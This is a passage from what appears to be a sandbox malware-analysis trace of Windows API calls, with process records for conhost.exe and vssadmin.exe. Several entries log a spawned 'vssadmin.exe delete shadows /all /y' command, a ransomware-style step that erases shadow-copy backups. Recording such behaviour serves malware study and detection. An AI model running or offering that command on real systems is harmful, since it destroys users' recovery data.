lpCommandLine="\"C:\\WINDOWS\\system32\\vssadmin.exe\" delete shadows /all /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x802e89c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4bb17c4 | out: lpCommandLine="\"C:\\WINDOWS\\system32\\vssadmin.exe\" delete shadows /all /y", lpProcessInformation=0x4bb17c4*(hProcess=0x434, hThread=0x790, dwProcessId=0xbac, dwThreadId=0x874)) returned 1 [0111.786] CloseHandle (hObject=0x790) returned 1 [0111.786] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\system32\\vssadmin.exe", dwFileAttributes=0x0, psfi=0x802e7d0, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x802e7d0) returned 0x4550 [0111.787] GetCurrentProcess () returned 0xffffffff [0111.787] GetCurrentProcess () returned 0xffffffff [0111.787] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x434, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x802ea54, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x802ea54*=0x790) returned 1 [0111.788] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x802ea4c*=0x790, lpdwindex=0x802e86c | out: lpdwindex=0x802e86c) returned 0x0 [0113.897] CloseHandle (hObject=0x790) returned 1 [0113.898] GetExitCodeProcess (in: hProcess=0x434, lpExitCode=0x802eab8 | out: lpExitCode=0x802eab8*=0x2) returned 1 [0113.901] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0113.995] CloseHandle (hObject=0x434) returned 1 [0113.996] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x802ebdc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802ebdc*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x55, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0114.015] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x802ef48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802ef48*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x55, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0114.015] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x802efa8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x53, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x802efa8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x53, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0114.016] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x802ef48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802ef48*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x53, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0114.016] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x802efa8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x54, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x802efa8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x54, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0114.018] SetEvent (hEvent=0x6d0) returned 1 [0114.018] SetEvent (hEvent=0x6c4) returned 1 [0114.018] SetEvent (hEvent=0x6c8) returned 1 [0114.018] SetEvent (hEvent=0x6cc) returned 1 [0114.018] SetEvent (hEvent=0x6e0) returned 1 [0114.018] SetEvent (hEvent=0x6d4) returned 1 [0114.018] SetEvent (hEvent=0x6d8) returned 1 [0114.018] SetEvent (hEvent=0x6dc) returned 1 [0114.022] SetEvent (hEvent=0x6e4) returned 1 [0114.029] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x802f0dc*=0x6ec, lpdwindex=0x802eefc | out: lpdwindex=0x802eefc) returned 0x0 [0114.029] SetThreadUILanguage (LangId=0x0) returned 0x870409 [0114.270] CoCreateGuid (in: pguid=0x802ef48 | out: pguid=0x802ef48*(Data1=0x3ab04c5c, Data2=0xc11a, Data3=0x49f8, Data4=([0]=0x86, [1]=0x13, [2]=0x39, [3]=0xef, [4]=0xa9, [5]=0x25, [6]=0x81, [7]=0xee))) returned 0x0 [0114.273] QueryPerformanceCounter (in: lpPerformanceCount=0x802ef28 | out: lpPerformanceCount=0x802ef28*=20802487930) returned 1 [0114.273] AmsiOpenSession () returned 0x0 [0114.273] AmsiScanString () returned 0x80070015 [0114.460] QueryPerformanceCounter (in: lpPerformanceCount=0x802eef0 | out: lpPerformanceCount=0x802eef0*=20821239526) returned 1 [0114.460] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x802efb8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802efb8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x65, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0114.460] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x802ef24*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802ef24*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x54, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0114.460] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x802efa8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x65, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x802efa8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x65, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0114.706] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x802eaa0*=0x7ac, lpdwindex=0x802e95c | out: lpdwindex=0x802e95c) returned 0x0 [0114.708] SetEvent (hEvent=0x7a8) returned 1 [0114.708] SetEvent (hEvent=0x7ac) returned 1 [0114.708] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x802ef48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802ef48*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x65, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0114.709] SetEvent (hEvent=0x7b4) returned 1 [0114.709] SetEvent (hEvent=0x7a8) returned 1 [0114.709] SetEvent (hEvent=0x7ac) returned 1 [0114.709] SetEvent (hEvent=0x7c4) returned 1 [0114.709] SetEvent (hEvent=0x7b8) returned 1 [0114.709] SetEvent (hEvent=0x7bc) returned 1 [0114.709] SetEvent (hEvent=0x7c0) returned 1 [0114.709] SetEvent (hEvent=0x7c8) returned 1 [0114.726] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x802f0dc*=0x6ec, lpdwindex=0x802eefc | out: lpdwindex=0x802eefc) returned 0x0 [0115.929] CoGetContextToken (in: pToken=0x802f4d0 | out: pToken=0x802f4d0) returned 0x0 [0115.931] CoUninitialize () Thread: id = 53 os_tid = 0xbc0 Thread: id = 54 os_tid = 0xdc8 [0107.669] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0107.670] CoGetContextToken (in: pToken=0x81afa14 | out: pToken=0x81afa14) returned 0x0 [0107.670] CObjectContext::QueryInterface () returned 0x0 [0107.670] CObjectContext::GetCurrentThreadType () returned 0x0 [0107.670] Release () returned 0x0 [0107.670] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0107.670] CoUninitialize () [0107.670] RoInitialize () returned 0x1 [0107.670] RoUninitialize () returned 0x0 [0107.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.765] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.827] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.027] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.212] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.335] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.387] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.551] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.815] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.159] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.315] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.706] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.031] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.183] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.612] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.753] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.878] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0111.088] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0111.372] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0111.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0111.909] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.153] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.291] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.478] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.552] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.607] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.745] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.805] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.865] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.869] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 57 os_tid = 0xe0c Thread: id = 58 os_tid = 0xa5c Process: id = "5" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x14ff4000" os_pid = "0x778" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xd2c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 26 os_tid = 0xd68 Thread: id = 27 os_tid = 0x9f4 Thread: id = 28 os_tid = 0xd7c Thread: id = 29 os_tid = 0xd8c Thread: id = 30 os_tid = 0xd48 Process: id = "6" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x1e2dd000" os_pid = "0xbac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xd2c" cmd_line = "\"C:\\WINDOWS\\system32\\vssadmin.exe\" delete shadows /all /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 55 os_tid = 0x874 Thread: id = 56 os_tid = 0x1194